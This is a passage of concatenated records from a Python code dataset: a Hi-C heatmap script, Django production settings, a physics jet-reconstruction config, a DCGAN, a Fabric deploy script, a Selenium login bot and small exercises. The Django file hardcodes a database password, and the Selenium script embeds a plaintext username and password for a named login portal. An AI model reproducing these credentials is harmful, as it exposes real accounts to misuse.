'get_pcs_initial_state',\n 'fill_root_above_rabbit_disk_free_limit',\n 'check_stopping_resources',\n 'health_check',\n 'fill_root_below_rabbit_disk_free_limit',\n 'check_stopping_resources',\n 'health_check',\n 'clean_up_space_on_root',\n 'check_starting_resources',\n 'health_check_sanity_smoke_ha',\n ]\n","sub_path":"system_test/tests/strength/test_filling_root.py","file_name":"test_filling_root.py","file_ext":"py","file_size_in_byte":2749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"190567860","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 16 10:08:37 2018\n\n@author: han-luo\n\"\"\"\n\nfrom __future__ import division\nimport numpy as np\nimport matplotlib\nmatplotlib.use('Agg')\n#from matplotlib.backends.backend_pdf import PdfPages\nimport matplotlib.pyplot as plt\nimport argparse\nimport sys\nfrom matplotlib.colors import LinearSegmentedColormap\n\n\ndef getargs():\n\n parser = argparse.ArgumentParser(description=\"Heat Map Plot.\")\n parser.add_argument('-m', '--mode', choices=['A', 'B'],\n help=\"\"\"Mode for data type.\n A means Raw Matrix.\n B means Ternary sparse matrix.\"\"\")\n\n parser.add_argument('-q', '--quantile',\n help='quantile for Max value of Heat Map.')\n parser.add_argument('-i', '--input', help='input file.')\n parser.add_argument('-o', '--out', help='Out put file')\n parser.add_argument('-r', '--resolution',\n help='resolution of HiC Data. Unit:bp')\n parser.add_argument('-p', '--position', default=None,\n help=\"\"\"Positon for each chromosome start.\n if intra-chromosome interaction.\n eg : chr1:250000:chr1:250000\n or chr1:50000000:chr2:35000000\n Unit : bp\"\"\")\n parser.add_argument('-t', '--type', choices=['wholeGenome', 'localGenome'],\n default='wholeGenome',\n help=\"\"\" whether to draw wholeGenome.\"\"\")\n\n parser.add_argument('-c', '--config', default=None,\n help=\"\"\" chromosome Size config file.\n When the type is wholeGenome,config file is necessary\n \"\"\")\n\n args = parser.parse_args()\n\n return args\n\n\ndef LoadData(fil, filetype):\n if filetype == 'A':\n Matrix = np.loadtxt(fil)\n return Matrix\n elif filetype == 'B':\n data_type = np.dtype({'names': ['bin1', 'bin2', 'IF'],\n 'formats': [np.int, np.int, np.float]})\n data = np.loadtxt(fil, dtype=data_type, usecols=[0, 1, 2])\n Matrix = getmatrix(data, 0, max(\n data['bin1'].max(), data['bin2'].max()))\n return Matrix\n else:\n return 0\n\n\ndef getmatrix(inter, l_bin, r_bin):\n inter_matrix = np.zeros((r_bin - l_bin, r_bin - l_bin), dtype=float)\n # Extract the regional data\n mask = (inter['bin1'] >= l_bin) & (inter['bin1'] < r_bin) & \\\n (inter['bin2'] >= l_bin) & (inter['bin2'] < r_bin)\n inter_extract = inter[mask]\n\n # Fill the matrix:\n for i in inter_extract:\n # Off-diagnoal parts\n if i['bin1'] != i['bin2']:\n inter_matrix[i['bin1'] - l_bin][i['bin2'] - l_bin] += i['IF']\n inter_matrix[i['bin2'] - l_bin][i['bin1'] - l_bin] += i['IF']\n else:\n # Diagonal part\n inter_matrix[i['bin1'] - l_bin][i['bin2'] - l_bin] += i['IF']\n\n return inter_matrix\n\n\ndef properU(pos):\n \"\"\"\n Express a genomic position in a proper unit (KB, MB, or both).\n\n \"\"\"\n i_part = int(pos) // 1000000 # Integer Part\n d_part = (int(pos) % 1000000) // 1000 # Decimal Part\n\n if (i_part > 0) and (d_part > 0):\n return ''.join([str(i_part), 'M', str(d_part), 'K'])\n elif (i_part == 0):\n return ''.join([str(d_part), 'K'])\n else:\n return ''.join([str(i_part), 'M'])\n\n\ndef LoadConfig(config):\n \"\"\"\n Load the Genome Size file.\n\n \"\"\"\n dtype = np.dtype({'names': ['chr', 'start', 'end'],\n 'formats': ['S16', np.int, np.int]})\n\n data = np.loadtxt(config, dtype=dtype, usecols=[0, 1, 2])\n\n return data\n\n\nif __name__ == '__main__':\n args = getargs()\n infile = args.input\n outfile = args.out\n resolution = int(args.resolution)\n mode = args.mode\n dtype = args.type\n Q = args.quantile\n if dtype == 'localGenome':\n if args.position == None:\n print(\"Positon parameter is necessary\")\n sys.exit(1)\n else:\n Pos = (args.position).split(':')\n else:\n if args.config == None:\n print(\"BinSize file of wholeGenome is necessary\")\n sys.exit(1)\n else:\n config = LoadConfig(args.config)\n\n Matrix = LoadData(infile, mode)\n nonzero = Matrix[np.nonzero(Matrix)]\n vmax = np.percentile(nonzero, Q)\n dtype = args.type\n\n Size = (16, (Matrix.shape[0] / Matrix.shape[1]) * 14)\n\n # Draw\n my_cmap = LinearSegmentedColormap.from_list(\n 'interaction', ['#FFFFFF', '#CD0000'])\n fig, ax = plt.subplots(1, figsize=Size)\n sc = ax.imshow(Matrix, cmap=my_cmap, aspect='auto', interpolation='none',\n extent=(0, Matrix.shape[1], 0, Matrix.shape[0]),\n vmax=vmax, origin='lower')\n if dtype == 'localGenome':\n xticks = list(np.linspace(0, Matrix.shape[1], 5).astype(int))\n xpos = [(int(t) * resolution + int(Pos[1])) for t in xticks]\n xlabels = [properU(p) for p in xpos]\n ax.set_xticks(xticks)\n ax.set_xticklabels(xlabels, size=8)\n\n yticks = list(np.linspace(0, Matrix.shape[0], 5).astype(int))\n ypos = [(int(t) * resolution + int(Pos[3])) for t in yticks]\n ylabels = [properU(p) for p in ypos]\n ax.set_yticks(yticks)\n ax.set_yticklabels(ylabels, size=8)\n\n ax.set_xlabel(Pos[0], labelpad=5, style='italic')\n ax.set_ylabel(Pos[2], labelpad=5, style='italic')\n\n else:\n for i in config['end']:\n ax.axvline(i, ax.get_ylim()[0], ax.get_ylim()[1], linestyle='--',\n color='black', linewidth=0.5)\n ax.axhline(i, ax.get_xlim()[0], ax.get_xlim()[1], linestyle='--',\n color='black', linewidth=0.5)\n ticks = []\n ticklabels = []\n ax.tick_params(axis='both', bottom=False, top=False, left=False,\n right=False, labelbottom=True, labeltop=False,\n labelleft=True, labelright=False)\n for i in config:\n ticks.append((i['start'] + i['end']) // 2)\n ticklabels.append(i['chr'].lstrip('chr'))\n ax.set_xticks(ticks)\n ax.set_xticklabels(ticklabels, size=8)\n ax.set_yticks(ticks)\n ax.set_yticklabels(ticklabels, size=8)\n\n fig.colorbar(sc)\n Dpi = np.ceil(Matrix.shape[0] / Size[0] / 100) * 100\n if Dpi > 300:\n Dpi = 300\n fig.savefig(outfile, dpi=Dpi, transparent=False)\n","sub_path":"src/Script/PlotHeatMap.py","file_name":"PlotHeatMap.py","file_ext":"py","file_size_in_byte":6534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"256523204","text":"from .settings import *\n\nDEBUG = False\n\nALLOWED_HOSTS = ['ubangservice.com', '127.0.0.1']\n\n# SESSION_COOKIE_DOMAIN = 'ubangservice.com'\n\nCORS_ORIGIN_ALLOW_ALL = False\n\n# CACHEOPS_REDIS = \"redis://redis:6379/0\"\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'postgres',\n 'USER': 'postgres',\n 'PASSWORD': 'Z)sOXXcBJ>wi',\n 'HOST': 'db',\n 'PORT': 5432,\n }\n}\n\nJWT_AUTH = {\n 'JWT_EXPIRATION_DELTA': datetime.timedelta(days=30),\n # 'JWT_AUTH_COOKIE': 'Access-Token',\n}\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'handlers': {\n 'console': {\n 'level': 'DEBUG',\n 'filters': None,\n 'class': 'logging.StreamHandler',\n },\n },\n 'loggers': {\n 'django': {\n 'handlers': ['console'],\n 'level': 'DEBUG',\n },\n },\n}","sub_path":"backend/backend/settings/prod.py","file_name":"prod.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"195831440","text":"# Copyright (C) 2002-2019 CERN for the benefit of the ATLAS collaboration\n\n# JetAlgorithm.py\n#\n# David Adams\n# March 2014\n# October 2014: Update to provide a fn that allow specification of alg sequence.\n#\n# Configure the jet algorithm after the tool manager has been configured.\n\nfrom AthenaCommon import Logging\njetlog = Logging.logging.getLogger('JetRec_jobOptions')\n\n# Record the jet algorithm here.\n# Retrieve this with \"from JetRec.JetAlgorithm import jetalg\" *after*\n# calling addJetRecoToAlgSequence().\njetalg = None\n\n# Function to add jet reconstruction to an algorithm sequence\n# job: algorithm sequence\n# useTruth: Flag to schedule building of selected-truth containers\n# eventShapeTools: Keys for the event shape tools to be run\n# separateJetAlgs: Run JetRecTools in separate algs (experts only)\n# debug: Debug level (0 for quiet). See below.\ndef addJetRecoToAlgSequence(job =None, useTruth =None, eventShapeTools =None,\n separateJetAlgs= None, debug =None):\n\n myname = \"JetAlgorithm: \"\n\n # We need this to modify the global variable.\n global jetalg\n\n # Import message level flags.\n from GaudiKernel.Constants import DEBUG\n\n # Import the jet reconstruction control flags.\n from JetRec.JetRecFlags import jetFlags\n\n # Import the standard jet tool manager.\n from JetRec.JetRecStandard import jtm\n\n # Set sequence and flags as needed.\n if job == None:\n from AthenaCommon.AlgSequence import AlgSequence\n job = AlgSequence()\n if useTruth == None:\n useTruth = jetFlags.useTruth()\n if eventShapeTools == None:\n eventShapeTools = jetFlags.eventShapeTools()\n if eventShapeTools == None:\n eventShapeTools = []\n if separateJetAlgs == None:\n separateJetAlgs = jetFlags.separateJetAlgs()\n\n\n # Event shape tools.\n evsDict = {\n \"emtopo\" : (\"EMTopoEventShape\", jtm.emget),\n \"lctopo\" : (\"LCTopoEventShape\", jtm.lcget),\n \"empflow\" : (\"EMPFlowEventShape\", jtm.empflowget),\n }\n\n if jetFlags.useTracks():\n if jetFlags.useVertices():\n evsDict[\"emtopo\"] = (\"EMTopoOriginEventShape\", jtm.emoriginget)\n evsDict[\"lctopo\"] = (\"LCTopoOriginEventShape\", jtm.lcoriginget)\n else:\n evsDict[\"emtopo\"] = (\"EMTopoOriginEventShape\", jtm.emget)\n evsDict[\"lctopo\"] = (\"LCTopoOriginEventShape\", jtm.lcget)\n jetlog.info( myname + \"Event shape tools: \" + str(eventShapeTools) )\n\n from RecExConfig.AutoConfiguration import IsInInputFile\n for evskey in eventShapeTools:\n from EventShapeTools.EventDensityConfig import configEventDensityTool\n if evskey in evsDict:\n (toolname, getter) = evsDict[evskey]\n if toolname in jtm.tools:\n jetlog.info( myname + \"Skipping duplicate event shape: \" + toolname )\n else:\n jetlog.info( myname + \"Adding event shape \" + evskey )\n if not IsInInputFile(\"xAOD::EventShape\",toolname):\n jtm += configEventDensityTool(toolname, getter.Label, 0.4)\n jtm.allEDTools += [jtm.tools[toolname]]\n else:\n jetlog.info( myname + \"Invalid event shape key: \" + evskey )\n raise Exception\n\n # Add the tool runner. It runs the jetrec tools.\n ctools = []\n # Add the truth tools.\n if useTruth: \n from JetRec.JetFlavorAlgs import scheduleCopyTruthParticles\n ctools += scheduleCopyTruthParticles()\n \n # build truth jet input :\n ctools += [ jtm.truthpartcopy, jtm.truthpartcopywz ]\n\n ## if jetFlags.useCells():\n ## ctools += [jtm.missingcells] commented out : incompatible with trigger : ATR-9696\n if jetFlags.useTracks:\n ctools += [jtm.tracksel, jtm.trackselloose_trackjets]\n if jetFlags.useVertices:\n ctools += [jtm.tvassoc]\n \n # LCOriginTopoClusters and EMOriginTopoClusters are shallow copies\n # of CaloCalTopoClusters. This means that if CaloCalTopoClusters gets\n # thinned on output, the the two derived containers need to be thinned\n # in the same way, else they'll be corrupted in the output.\n # FIXME: this should be automatic somehow.\n postalgs = []\n thinneg = False\n from RecExConfig.RecFlags import rec\n if rec.doWriteAOD() and not rec.readAOD():\n from ParticleBuilderOptions.AODFlags import AODFlags\n if AODFlags.ThinNegativeEnergyCaloClusters:\n thinneg = True\n \n if jetFlags.useTracks and jetFlags.useVertices:\n if not IsInInputFile(\"xAOD::CaloClusterContainer\",\"LCOriginTopoClusters\"):\n ctools += [jtm.JetConstitSeq_LCOrigin]\n if thinneg:\n from ThinningUtils.ThinningUtilsConf import ThinNegativeEnergyCaloClustersAlg\n postalgs.append (ThinNegativeEnergyCaloClustersAlg ('ThinNegLCOriginTopoClusters',\n ThinNegativeEnergyCaloClusters = True,\n CaloClustersKey = 'LCOriginTopoClusters',\n StreamName = 'StreamAOD'))\n if not IsInInputFile(\"xAOD::CaloClusterContainer\",\"EMOriginTopoClusters\"):\n ctools += [jtm.JetConstitSeq_EMOrigin]\n if thinneg:\n from ThinningUtils.ThinningUtilsConf import ThinNegativeEnergyCaloClustersAlg\n postalgs.append (ThinNegativeEnergyCaloClustersAlg ('ThinNegEMOriginTopoClusters',\n ThinNegativeEnergyCaloClusters = True,\n CaloClustersKey = 'EMOriginTopoClusters',\n StreamName = 'StreamAOD'))\n if not IsInInputFile(\"xAOD::PFOContainer\",\"CHSParticleFlowObjects\"):\n if not hasattr(job,\"jetalgCHSPFlow\"):\n ctools += [jtm.JetConstitSeq_PFlowCHS]\n if thinneg:\n from ThinningUtils.ThinningUtilsConf import ThinNegativeEnergyNeutralPFOsAlg\n CHSnPFOsThinAlg = ThinNegativeEnergyNeutralPFOsAlg(\n \"ThinNegativeEnergyCHSNeutralPFOsAlg\",\n NeutralPFOsKey=\"CHSNeutralParticleFlowObjects\",\n ThinNegativeEnergyNeutralPFOs = True,\n StreamName = 'StreamAOD'\n )\n postalgs.append(CHSnPFOsThinAlg)\n\n from JetRec.JetRecConf import JetToolRunner\n from JetRec.JetRecConf import JetAlgorithm\n runners = []\n if len(ctools)>0:\n jtm += JetToolRunner(\"jetconstit\",\n EventShapeTools=[],\n Tools=ctools,\n Timer=jetFlags.timeJetToolRunner()\n )\n job += JetAlgorithm(\"jetalgConstituents\",\n Tools=[jtm.jetconstit])\n\n # Add all the PseudoJetAlgorithms now\n # To avoid massive refactoring and to preserve familiarity,\n # kept calling things \"getters\", but these are already\n # PseudoJetAlgorithms as we eliminated the wrappers\n for getter in jtm.allGetters:\n job += getter\n\n # Then, add all event shape tools in separate algs\n for evstool in jtm.allEDTools:\n from EventShapeTools.EventShapeToolsConf import EventDensityAthAlg\n job += EventDensityAthAlg(\"edalg_\"+evstool.OutputContainer,EventDensityTool=evstool)\n\n if separateJetAlgs:\n\n for t in jtm.jetrecs:\n jalg = JetAlgorithm(\"jetalg\"+t.name(),\n Tools = [t])\n job += jalg\n\n else:\n from JetRec.JetRecConf import JetToolRunner\n jtm += JetToolRunner(\"jetrun\",\n EventShapeTools=[],\n Tools=rtools+jtm.jetrecs,\n Timer=jetFlags.timeJetToolRunner()\n )\n runners += [jtm.jetrun]\n\n job += JetAlgorithm(\"jetalg\")\n jetalg = job.jetalg\n jetalg.Tools = runners\n if jetFlags.debug > 0:\n # jtm.setOutputLevel(jtm.jetrun, DEBUG)\n jetalg.OutputLevel = DEBUG\n if jetFlags.debug > 1:\n for tool in jtm.jetrecs:\n jtm.setOutputLevel(tool, DEBUG)\n if jetFlags.debug > 2:\n for tool in jtm.finders:\n jtm.setOutputLevel(tool, DEBUG)\n if jetFlags.debug > 3:\n jtm.setOutputLevel(jtm.jetBuilderWithArea, DEBUG)\n jtm.setOutputLevel(jtm.jetBuilderWithoutArea, DEBUG)\n\n for postalg in postalgs:\n job += postalg\n \n","sub_path":"Reconstruction/Jet/JetRec/python/JetAlgorithm.py","file_name":"JetAlgorithm.py","file_ext":"py","file_size_in_byte":8050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"598579181","text":"\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom keras.datasets import mnist\nfrom keras.layers import (Activation, BatchNormalization, Dense, Dropout, Flatten, Reshape)\nfrom keras.layers.advanced_activations import LeakyReLU\nfrom keras.layers.convolutional import Conv2D, Conv2DTranspose\nfrom keras.models import Sequential\nfrom keras.optimizers import Adam\n\nclass Dataset:\n def __init__(self):\n self.num_labeled = 100\n\n (self.x_train, self.y_train), (self.x_test, self.y_test) = mnist.load_data()\n\n def training_set(self):\n x_train = self.x_train[range(self.num_labeled)]\n y_train = self.y_train[range(self.num_labeled)]\n return x_train, y_train\n\n\n def test_set(self):\n return self.x_test, self.y_test\n\nclass DCGAN:\n def __init__(self):\n self.img_rows = 28\n self.img_cols = 28\n self.channels = 1\n self.img_shape = (self.img_rows, self.img_cols, self.channels)\n self.z_dim = 100\n \n\n \n\n def build_generator(self):\n\n model = Sequential()\n\n model.add(Dense(256 * 7 * 7, input_dim=self.z_dim))\n model.add(Reshape((7, 7, 256)))\n model.add(Conv2DTranspose(128, kernel_size=3, strides=2, padding='same'))\n model.add(BatchNormalization())\n model.add(LeakyReLU(alpha=0.01))\n model.add(Conv2DTranspose(64, kernel_size=3, strides=1, padding='same'))\n model.add(BatchNormalization())\n model.add(LeakyReLU(alpha=0.01))\n model.add(Conv2DTranspose(1, kernel_size=3, strides=2, padding='same'))\n model.add(Activation('tanh'))\n return model\n\n def build_discriminator(self):\n model = Sequential()\n model.add(Conv2D(32,kernel_size=3, strides=2,input_shape=self.img_shape,padding='same'))\n model.add(LeakyReLU(alpha=0.01))\n model.add(Conv2D(64,kernel_size=3,strides=2, input_shape=self.img_shape,padding='same'))\n model.add(BatchNormalization())\n model.add(LeakyReLU(alpha=0.01))\n model.add(Conv2D(128,kernel_size=3,strides=2,input_shape=self.img_shape,padding='same'))\n model.add(BatchNormalization())\n model.add(LeakyReLU(alpha=0.01))\n model.add(Flatten())\n model.add(Dropout(0.5))\n model.add(Dense(1, activation='sigmoid'))\n return model\n\n def build_gan(self,generator,discriminator):\n model = Sequential()\n model.add(generator)\n model.add(discriminator)\n return model\n\n\n def train(self,iterations, batch_size, sample_interval):\n train_hist={}\n train_hist['D_losses']=[]\n train_hist['G_losses']=[]\n def save_model(step):\n f1= 'models/dcgan_discriminator_weight_%04d.h5' % (step+1)\n f2= 'models/dcgan_generator_weight_%04d.h5' % (step+1)\n discriminator.save(f1)\n generator.save(f2)\n #print(\"save model\")\n\n losses = []\n accuracies = []\n iteration_checkpoints = []\n d_losses_real=[]\n d_losses_fake=[]\n \n (X_train, _), (_,_) = mnist.load_data()\n\n def sample_images(epoch,image_grid_rows=4, image_grid_columns=4):\n\n z = np.random.normal(0, 1, (image_grid_rows * image_grid_columns, self.z_dim))\n gen_imgs = generator.predict(z)\n gen_imgs = 0.5 * gen_imgs + 0.5\n fig, axs = plt.subplots(image_grid_rows,\n image_grid_columns,\n figsize=(10, 4),\n sharey=True,\n sharex=True)\n\n cnt = 0\n for i in range(image_grid_rows):\n for j in range(image_grid_columns):\n axs[i, j].imshow(gen_imgs[cnt, :, :, 0], cmap='gray')\n axs[i, j].axis('off')\n cnt += 1\n plt.tight_layout()\n plt.show()\n #fig.savefig(\"images/generator/%d.png\" % epoch)\n\n \n discriminator = self.build_discriminator()\n discriminator.compile(loss='binary_crossentropy',optimizer=Adam(),metrics=['accuracy'])\n\n generator = self.build_generator()\n discriminator.trainable = False\n\n gan = self.build_gan(generator, discriminator)\n gan.compile(loss='binary_crossentropy', optimizer=Adam())\n \n\n X_train = X_train / 127.5 - 1.0\n X_train = np.expand_dims(X_train, axis=3)\n\n real = np.ones((batch_size, 1))\n\n fake = np.zeros((batch_size, 1))\n\n for iteration in range(iterations):\n idx = np.random.randint(0, X_train.shape[0], batch_size)\n imgs = X_train[idx]\n\n z = np.random.normal(0, 1, (batch_size, 100))\n gen_imgs = generator.predict(z)\n\n d_loss_real = discriminator.train_on_batch(imgs, real)\n d_loss_fake = discriminator.train_on_batch(gen_imgs, fake)\n d_loss, accuracy = 0.5 * np.add(d_loss_real, d_loss_fake)\n\n\n\n g_loss = gan.train_on_batch(z, real)\n\n if (iteration + 1) % sample_interval == 0:\n train_hist['D_losses'].append(d_loss)\n train_hist['G_losses'].append(g_loss)\n\n #losses.append((d_loss, g_loss))\n d_losses_real.append(d_loss_real)\n d_losses_fake.append(d_loss_fake)\n accuracies.append(100.0 * accuracy)\n iteration_checkpoints.append(iteration + 1)\n\n print(\"%d [D loss: %f] [G loss: %f]\" % (iteration + 1, d_loss, g_loss))\n\n sample_images(iteration)\n save_model(iteration)\n return train_hist, accuracies, iteration_checkpoints, d_losses_real,d_losses_fake","sub_path":"DCGAN/dcgan.py","file_name":"dcgan.py","file_ext":"py","file_size_in_byte":5711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"312873375","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\nUsage:\n fab deploy:appname\n\"\"\"\nfrom fabric.api import env, run, cd, local, put\n\nenv.hosts = ['myserver.com']\nenv.user = 'eric'\nDEPLOY_PATH = '/var/www/'\nAPP_NAME = None\nAPP_PATH = None\nDATABASE_CONF_PATH = '/srv/conf/database.yml'\n\ndef pack_code():\n local('svn export --force svn://192.168.1.5/projects/%s /tmp/%s'%(APP_NAME,APP_NAME))\n with cd('/tmp/%s'%APP_NAME):\n local('tar czf /tmp/%s.tgz .'%APP_NAME)\n\ndef upload_code():\n put('/tmp/%s.tgz'%APP_NAME, '/tmp/')\n with cd(APP_PATH):\n run('tar xzf /tmp/%s.tgz'%APP_NAME)\n\ndef conf():\n run(\"cp %s %s/config/\"%(DATABASE_CONF_PATH, APP_PATH))\n run(\"ln -nfs /srv/photos %s/public/photos\"%APP_PATH)\n with cd(APP_PATH):\n run(\"rake db:migrate RAILS_ENV=production\")\n\ndef restart(name='back-end'):\n run(\"touch %s%s/tmp/restart.txt\"%(DEPLOY_PATH, name))\n\ndef deploy(name='back-end'):\n global APP_NAME, APP_PATH\n APP_NAME = name\n APP_PATH = '%s%s'%(DEPLOY_PATH, APP_NAME)\n pack_code()\n upload_code()\n conf()\n restart(APP_NAME)","sub_path":"dockerized-gists/472566/snippet.py","file_name":"snippet.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"37779496","text":"#faz o import da biblioteca selenium o webdriver para manipular browser\r\nfrom selenium import webdriver\r\n\r\n#define a variavel browser e chama o aplicativo para abrir na pag.\r\n#browser = webdriver.Ie()\r\nbrowser2 = webdriver.Chrome()\r\n#type(browser)\r\ntype(browser2)\r\n\r\n#aqui nós designamos qual Url o robo abre no browser que definimos acima.\r\n#browser.get('http://gc.gssbr.com.br:7777')\r\nbrowser2.get('http://osonline.aegea.com.br:5555/sansysos/efetuarLoginUsuario.wf?flSessaoExpirada=S')\r\n\r\n#abaixo fazemos o login que definimos na url do browser2.\r\nloginelmen = browser2.find_element_by_name('nmLogin')\r\nloginelmen.send_keys('tanzilheiro.camboriu')\r\nloginelmen2 = browser2.find_element_by_name('nmSenha')\r\nloginelmen2.send_keys('Theo@2018')\r\n\r\n#aqui damos o comando para o robo clicar em ENTRAR na pagina que logamos acima\r\nentrar = browser2.find_element_by_name('_eventId_btLogar')\r\nentrar.submit()\r\n\r\nbrowser2.manage().timeouts().pageLoadTimeout(30, TimeUnit.SECONDS);\r\noperacional = browser2.find_element_by_id('ext-240')","sub_path":"roboto.py","file_name":"roboto.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"19002057","text":"\"\"\"\nCreated on 7/7/16\nAuthor = jchan\n\"\"\"\n__author__ = 'jchan'\n\nimport numpy as np\nfrom pykalman import KalmanFilter\n\nfrom algotrader.technical import Indicator\n\n\nclass KalmanFilteringPairRegression(Indicator):\n SLOPE = 'slope'\n INTERCEPT = 'intercept'\n\n __slots__ = (\n 'length',\n )\n\n @staticmethod\n def get_name(input, length):\n return \"KalmanFilteringPairRegression(%s,%s)\" % (Indicator.get_input_name(input), length)\n\n def __init__(self, input=None, length=10, description=\"Kalman Filter Regression\"):\n super(KalmanFilteringPairRegression, self) \\\n .__init__(KalmanFilteringPairRegression.get_name(input, length),\n input=input,\n keys=['slope', 'intercept'],\n default_key='slope',\n description=description)\n self.length = int(length)\n delta = 1e-5\n self.trans_cov = delta / (1 - delta) * np.eye(2)\n super(KalmanFilteringPairRegression, self).update_all()\n\n def on_update(self, data):\n result = {}\n result['timestamp'] = data['timestamp']\n if self.input.size() >= self.length:\n\n independent_var = self.input.get_by_idx_range(key=None, start_idx=0, end_idx=-1)\n symbol_set = set(self.input.keys)\n depend_symbol = symbol_set.difference(self.input.default_key)\n depend_var = self.input.get_by_idx_range(key=depend_symbol, start_idx=0, end_idx=-1)\n\n obs_mat = np.vstack([independent_var.values, np.ones(independent_var.values.shape)]).T[:, np.newaxis]\n model = KalmanFilter(n_dim_obs=1, n_dim_state=2,\n initial_state_mean=np.zeros(2),\n initial_state_covariance=np.ones((2, 2)),\n transition_matrices=np.eye(2),\n observation_matrices=obs_mat,\n observation_covariance=1.0,\n transition_covariance=self.trans_cov)\n\n state_means, state_covs = model.filter(depend_var.values)\n slope = state_means[:, 0][-1]\n result[Indicator.VALUE] = slope\n result[KalmanFilteringPairRegression.SLOPE] = slope\n result[KalmanFilteringPairRegression.SLOPE] = state_means[:, 1][-1]\n self.add(result)\n\n else:\n result[Indicator.VALUE] = np.nan\n result[KalmanFilteringPairRegression.SLOPE] = np.nan\n result[KalmanFilteringPairRegression.SLOPE] = np.nan\n self.add(result)\n","sub_path":"algotrader/technical/kfpairregression.py","file_name":"kfpairregression.py","file_ext":"py","file_size_in_byte":2601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"438368611","text":"from .client_call import ClientCall\n\n\nclass ChooseRole(ClientCall):\n def __init__(self, first: str, second: str):\n super().__init()\n self.first_role: str = first or \"FILL\"\n self.second_role: str = second or \"FILL\"\n\n async def build(self):\n self.method = \"PUT\"\n self.endpoint = (\n \"/lol-lobby/v2/lobby/members/localMember/position-preferences\",\n )\n self.payload = {\n \"firstPreference\": self.first_role,\n \"secondPreference\": self.second_role,\n }\n\n async def action(self, response: WebsocketEventResponse):\n print(\"Selected role\")\n","sub_path":"leaguepybotv2.0/_backup2/leaguepybotv2.1/commands/choose_role.py","file_name":"choose_role.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"199431279","text":"import arcade\n\nSCREEN_WIDTH = 800\nSCREEN_HEIGHT = 600\nSEEDS = 4\nPARASITES = 4\nPOS_IN_LINE = SCREEN_WIDTH / 5\n\n\ndef draw_rind():\n arcade.draw_lrtb_rectangle_filled(0, SCREEN_WIDTH, SCREEN_HEIGHT/8, 0, arcade.color.GREEN)\n arcade.draw_lrtb_rectangle_filled(SCREEN_WIDTH/5, SCREEN_WIDTH*2/5, SCREEN_HEIGHT/8, 0, arcade.color.DARK_GREEN)\n arcade.draw_lrtb_rectangle_filled(SCREEN_WIDTH*3/5, SCREEN_WIDTH*4/5, SCREEN_HEIGHT/8, 0, arcade.color.DARK_GREEN)\n arcade.draw_lrtb_rectangle_filled(0, SCREEN_WIDTH, SCREEN_HEIGHT/8+5, SCREEN_HEIGHT/8, arcade.color.WHITE)\n\n\ndef draw_seed(x, y):\n arcade.draw_parabola_filled(x, y, x + 20, 15,\n arcade.color.BLACK_OLIVE, 180)\n arcade.draw_triangle_filled(x, y + 15, x + 20, y + 15,\n x + 10, y + 35, arcade.color.BLACK_OLIVE)\n\n\ndef draw_pearl_string(x, y):\n arcade.draw_circle_filled(x, y, 15, arcade.color.PEARL)\n arcade.draw_circle_filled(x-25, y+15, 15, arcade.color.PEARL)\n arcade.draw_circle_filled(x+25, y+15, 15, arcade.color.PEARL)\n arcade.draw_circle_filled(x+50, y+30, 15, arcade.color.PEARL)\n arcade.draw_circle_filled(x-50, y+30, 15, arcade.color.PEARL)\n\n\ndef add_seeds():\n seed_pos = POS_IN_LINE\n for i in range(SEEDS):\n draw_seed(seed_pos, 100)\n seed_pos += SCREEN_WIDTH/5\n\n\ndef draw_parasite(x, y):\n arcade.draw_parabola_outline(x,\n y, x + 20, 20, arcade.color.FOREST_GREEN, 6, 0)\n arcade.draw_parabola_outline(x + 20,\n y, x + 50, 20, arcade.color.FOREST_GREEN, 6, 180)\n arcade.draw_parabola_outline(x + 90,\n y, x + 120, 20, arcade.color.FOREST_GREEN, 6, 0)\n arcade.draw_parabola_outline(x + 120,\n y, x + 140, 20, arcade.color.FOREST_GREEN, 6, 180)\n arcade.draw_circle_filled(x + 70,\n y, 30, arcade.color.FOREST_GREEN)\n arcade.draw_parabola_outline(x,\n y - 20, x + 20, 20, arcade.color.FOREST_GREEN, 6, 0)\n arcade.draw_parabola_outline(x + 20,\n y - 20, x + 40, 20, arcade.color.FOREST_GREEN, 6,\n 180)\n arcade.draw_parabola_outline(x + 100,\n y - 20, x + 120, 20, arcade.color.FOREST_GREEN, 6,\n 0)\n arcade.draw_parabola_outline(x + 120,\n y - 20, x + 140, 20, arcade.color.FOREST_GREEN, 6,\n 180)\n arcade.draw_circle_filled(x + 70,\n y, 10, arcade.color.BLACK)\n\n\ndef add_parasites():\n parasite_pos = POS_IN_LINE\n for i in range(PARASITES):\n draw_parasite(parasite_pos, 300)\n parasite_pos += SCREEN_WIDTH / 5\n\n\ndef main():\n arcade.open_window(SCREEN_WIDTH, SCREEN_HEIGHT, \"Robbie's Watermelon Land\")\n arcade.set_background_color(arcade.color.PERSIAN_RED)\n arcade.start_render()\n\n draw_rind()\n add_seeds()\n add_parasites()\n draw_pearl_string(400, 500)\n\n arcade.finish_render()\n arcade.run()\n\n\nmain()\n","sub_path":"Lab 03 - Draw Using Functions/lab_03.py","file_name":"lab_03.py","file_ext":"py","file_size_in_byte":3143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"433954100","text":"from pathlib import Path\n\n\ndef parse_data():\n with open(Path(__file__).stem + 